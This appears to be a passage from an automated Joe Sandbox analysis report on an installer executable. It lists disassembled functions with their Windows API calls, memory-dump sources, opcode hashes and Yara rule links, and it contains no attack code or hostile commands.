                                                                                                                                                                              • Instruction Fuzzy Hash: 77510671A00209EFDF24DFA5D988BEEBBF8EF09304F14415AE415B72A1DB716944CB24
                                                                                                                                                                              Function 00BBCCF0 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(?), ref: 00BBCDCC
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BBCDDB
                                                                                                                                                                              • ReleaseDC.USER32(00000000), ref: 00BBCE22
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsDeviceRelease
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 127614599-0
                                                                                                                                                                              • Opcode ID: d78227ecd04cc97b92fa5ed8f4855405bd418b585f5b5e5d555d58bbcdc03f93
                                                                                                                                                                              • Instruction ID: db85df93cef47812e569167236821837b54e94150bc5317f487f47a482bc086b
                                                                                                                                                                              • Opcode Fuzzy Hash: d78227ecd04cc97b92fa5ed8f4855405bd418b585f5b5e5d555d58bbcdc03f93
                                                                                                                                                                              • Instruction Fuzzy Hash: D951F575A00349EFDB10DFA5C898BAA7BF8EF08311F10416AE959E7291D774D944CBA0
                                                                                                                                                                              Function 00BB7230 Relevance: 7.6, APIs: 5, Instructions: 125windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemMessageSendWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 799199299-0
                                                                                                                                                                              • Opcode ID: ee6b4355ed68684a20ab2c9467880614cc98c92535ce8cd606836481881f92bb
                                                                                                                                                                              • Instruction ID: 02e51767f26735aa45be739d5f28c07bd11792705a162644522bd867407bca81
                                                                                                                                                                              • Opcode Fuzzy Hash: ee6b4355ed68684a20ab2c9467880614cc98c92535ce8cd606836481881f92bb
                                                                                                                                                                              • Instruction Fuzzy Hash: 1041D432348601DFC714CF15D894EBAB7E9FBC4311F0449AAE946C6261DBB1EC12EB64
                                                                                                                                                                              Function 00CC5040 Relevance: 7.6, APIs: 5, Instructions: 122COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00CC5074
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00CC5096
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC50BE
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00CC51A7
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC51D1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 459529453-0
                                                                                                                                                                              • Opcode ID: 07d2ef0976c71d7b7b0c5315be38ff2fc60cd9d086a932a1b7f7a72c910f4103
                                                                                                                                                                              • Instruction ID: a077d0da287379fddd955ab4f8806a843e630263d22bb8e24bca93a090357fd8
                                                                                                                                                                              • Opcode Fuzzy Hash: 07d2ef0976c71d7b7b0c5315be38ff2fc60cd9d086a932a1b7f7a72c910f4103
                                                                                                                                                                              • Instruction Fuzzy Hash: 6D518B70A00648DFDB11CF58C845BAEBBB0EF41354F28815DE855AB381EBB5BA45CBE1
                                                                                                                                                                              Function 00BD0450 Relevance: 7.6, APIs: 5, Instructions: 109windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFocus.USER32(00000000,?,?), ref: 00BD04C8
                                                                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BD0510
                                                                                                                                                                              • SendMessageW.USER32(?,0000102C,000000FF,0000F000), ref: 00BD052C
                                                                                                                                                                              • SendMessageW.USER32(?,0000102B,000000FF,?), ref: 00BD055E
                                                                                                                                                                              • SetFocus.USER32(00000000,?,?), ref: 00BD0571
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Focus
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3982298024-0
                                                                                                                                                                              • Opcode ID: 494ab6d69a42812e97a7cdbdfeaf73b98e499e91c747b73442000f3a99333e39
                                                                                                                                                                              • Instruction ID: 4429089b67379a298a9d6d52813be5c71797f6001b9053fe1e3dc4da199a7a10
                                                                                                                                                                              • Opcode Fuzzy Hash: 494ab6d69a42812e97a7cdbdfeaf73b98e499e91c747b73442000f3a99333e39
                                                                                                                                                                              • Instruction Fuzzy Hash: B3417C75900708DFDB20DF69C884BAAB7F4FF48710F20426AE829A77A1DB30A844CF50
                                                                                                                                                                              Function 00BB0B20 Relevance: 7.6, APIs: 5, Instructions: 60memorywindowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BB0B6A
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00BB0B70
                                                                                                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 00BB0B93
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00DA9C66,000000FF), ref: 00BB0BBB
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,00DA9C66,000000FF), ref: 00BB0BC1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$FreeProcess$FormatMessage
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1606019998-0
                                                                                                                                                                              • Opcode ID: 2458fd7a3b939283796279471b8499bda024796f916c7b5d8b5c9097691a809f
                                                                                                                                                                              • Instruction ID: 4c72ad8df1ac0d994be61b6cd470cea5354dc329d8e50f52d83444b80a503fc9
                                                                                                                                                                              • Opcode Fuzzy Hash: 2458fd7a3b939283796279471b8499bda024796f916c7b5d8b5c9097691a809f
                                                                                                                                                                              • Instruction Fuzzy Hash: 9A1151B1A14219ABEB10EBA4CD01BAFB7F8EB04B04F104519F514A72C1D7F59A048BA0
                                                                                                                                                                              Function 00BC8BB0 Relevance: 7.6, APIs: 5, Instructions: 58windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BC8BBB
                                                                                                                                                                              • SendMessageW.USER32(?,?,?,0000102B), ref: 00BC8C18
                                                                                                                                                                              • SendMessageW.USER32(?,?,?,0000102B), ref: 00BC8C67
                                                                                                                                                                              • SendMessageW.USER32(?,00001043,00000000,00000000), ref: 00BC8C78
                                                                                                                                                                              • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00BC8C85
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$LongWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 312131281-0
                                                                                                                                                                              • Opcode ID: bf6ed4e2f83d3ca26983fb0f9593a28515db98f2d732c204eeddf20cd9f3dcd5
                                                                                                                                                                              • Instruction ID: c9df734537d21971db3810512ef81af737e78e7e741f11ad87653ac8bedfd501
                                                                                                                                                                              • Opcode Fuzzy Hash: bf6ed4e2f83d3ca26983fb0f9593a28515db98f2d732c204eeddf20cd9f3dcd5
                                                                                                                                                                              • Instruction Fuzzy Hash: 33214232918346AAD220DF11CD44B1ABBF5FFED758F202B1EF1D4211A4E7F195848E96
                                                                                                                                                                              Function 00BD4C90 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 314windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(?,RichEdit20W,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00BD4E3C
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00BD4E51
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00BD4E59
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$AllocateCreateHeapWindow
                                                                                                                                                                              • String ID: RichEdit20W
                                                                                                                                                                              • API String ID: 2359350451-4173859555
                                                                                                                                                                              • Opcode ID: a29d0055ff111249c44ef7359ea1fe479947442b374ba93bbaa3c3e43b4ccc37
                                                                                                                                                                              • Instruction ID: e93c43d0b8cc4c8eaf18bf12440b177e3800d63e20a3304354745183b4dcdcce
                                                                                                                                                                              • Opcode Fuzzy Hash: a29d0055ff111249c44ef7359ea1fe479947442b374ba93bbaa3c3e43b4ccc37
                                                                                                                                                                              • Instruction Fuzzy Hash: BAB18B71A012199FDB14CFA8C884BEEBBF5FF49710F1441AAE805AB3A1D775AD00CB60
                                                                                                                                                                              Function 00D00D70 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 238COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D14240: SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?,?,?,00EA16AC), ref: 00D14250
                                                                                                                                                                                • Part of subcall function 00D14240: LoadLibraryW.KERNEL32(Shell32.dll,?,?,00EA16AC), ref: 00D14263
                                                                                                                                                                                • Part of subcall function 00D14240: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00D14273
                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,ADVINST_LOGS,0000000C,00EA16AC), ref: 00D00E58
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressAllocateExistsFileFolderHeapLibraryLoadLocationPathProcSpecial
                                                                                                                                                                              • String ID: ADVINST_LOGS$Everyone
                                                                                                                                                                              • API String ID: 3321256476-3921853867
                                                                                                                                                                              • Opcode ID: 59f1748d3ea927acc43d8b9f2e6743f9fd1b17920e6a71bdad35a90e7a819b15
                                                                                                                                                                              • Instruction ID: 1a7af25671e13df7dde652e88cfb4a9daffd6c9239ecadae533afc853e813ff4
                                                                                                                                                                              • Opcode Fuzzy Hash: 59f1748d3ea927acc43d8b9f2e6743f9fd1b17920e6a71bdad35a90e7a819b15
                                                                                                                                                                              • Instruction Fuzzy Hash: 59919E71901209DFDB10DFA8C949BAEBBB4EF04314F244159E919BB2D2DB355E44CBA1
                                                                                                                                                                              Function 00BCF1E0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 211windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                                • Part of subcall function 00CAA030: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,00BC8188,00000000,80004005), ref: 00CAA098
                                                                                                                                                                                • Part of subcall function 00CAA030: RedrawWindow.USER32(?,00000000,00000000,00000541,?,?,?,000000EF,?,00BC8188,00000000,80004005), ref: 00CAA0A9
                                                                                                                                                                                • Part of subcall function 00CAA030: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CAA0C8
                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00000004,00000004), ref: 00BCF37D
                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00000400,00000400), ref: 00BCF394
                                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00BCF3F0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window$AllocateHeapRedraw
                                                                                                                                                                              • String ID: QuickSelectionList
                                                                                                                                                                              • API String ID: 884508843-3633591268
                                                                                                                                                                              • Opcode ID: 0e869bd2ad6e7d9f0d5fc533156a591fef7ac481156a5bda445b99c6e4ee18fc
                                                                                                                                                                              • Instruction ID: c84f99548b8a99bac224524886814d7cb5a1a56234c0f42d71d5f5f88e21ff9d
                                                                                                                                                                              • Opcode Fuzzy Hash: 0e869bd2ad6e7d9f0d5fc533156a591fef7ac481156a5bda445b99c6e4ee18fc
                                                                                                                                                                              • Instruction Fuzzy Hash: 6E71BC71A00205AFDB14DF68C885BAEF7F5FF89324F10466DF565A7290DB74A904CB60
                                                                                                                                                                              Function 00D01220 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,02141699), ref: 00D01272
                                                                                                                                                                              • CloseHandle.KERNEL32(00000008,02141699,?,?,00000000,00DF6653,000000FF,?,80004005), ref: 00D013F0
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,02141699,?,?,00000000,00DF6653,000000FF,?,80004005), ref: 00D0141F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseHandle$FileModuleName
                                                                                                                                                                              • String ID: LOG
                                                                                                                                                                              • API String ID: 3884789274-429402703
                                                                                                                                                                              • Opcode ID: 894af25042bf12d667d08c04af1f9c1b756eb626197a3c17da7c51e7362befcf
                                                                                                                                                                              • Instruction ID: 22ed970161fcc607f868ba9e918d79aed9afaad9262c50259d61885e0842f10c
                                                                                                                                                                              • Opcode Fuzzy Hash: 894af25042bf12d667d08c04af1f9c1b756eb626197a3c17da7c51e7362befcf
                                                                                                                                                                              • Instruction Fuzzy Hash: 1651D275A04344DFDB24DF68C8057AA77F5FF44700F14866AE81ADB6C0E774AA04C7A4
                                                                                                                                                                              Function 00CCBAE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,?,00000000,00DE871D,000000FF,?,80004005,02141699,?), ref: 00CCBB83
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,02141699,?,74DF3340,?,00000000,00DE871D,000000FF,?,00CCB927,?,?,74DF3220), ref: 00CCBBB2
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,74DF3220), ref: 00CCBBC2
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DeleteFileInit_thread_footer$ErrorFindHeapLastProcessResource
                                                                                                                                                                              • String ID: \\?\
                                                                                                                                                                              • API String ID: 1908169709-4282027825
                                                                                                                                                                              • Opcode ID: 332d12176a304d5471b02601d975d809d44f32602c540018c6fabac3c243697f
                                                                                                                                                                              • Instruction ID: 43228b54f768265e1cf8e94204acfe607b2464ee6ef6c272c98e488124a62d41
                                                                                                                                                                              • Opcode Fuzzy Hash: 332d12176a304d5471b02601d975d809d44f32602c540018c6fabac3c243697f
                                                                                                                                                                              • Instruction Fuzzy Hash: CD21A171904618DFDB10DFA9C85AFAAB7E8FF05321F20469DE861D72A4DB369D04CB50
                                                                                                                                                                              Function 00BB0EF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException), ref: 00BB0F32
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BB0F38
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
